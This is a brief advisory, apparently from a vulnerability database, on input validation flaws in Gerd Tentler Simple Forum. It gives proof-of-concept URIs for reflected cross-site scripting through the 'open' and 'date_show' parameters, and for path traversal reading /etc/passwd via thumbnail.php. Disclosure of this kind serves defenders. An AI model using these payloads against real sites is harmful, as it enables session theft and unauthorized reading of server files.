Gerd Tentler Simple Forum Multiple Input Validation Vulnerabilities

Gerd Tentler Simple Forum Multiple Input Validation Vulnerabilities

An attacker can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting victim into following a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/path/forum.php?open="/><script>alert(document.cookie)</script>

http://www.example.com/path/forum.php?date_show="/><script>alert(document.cookie)</script>

http://www.example.com/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd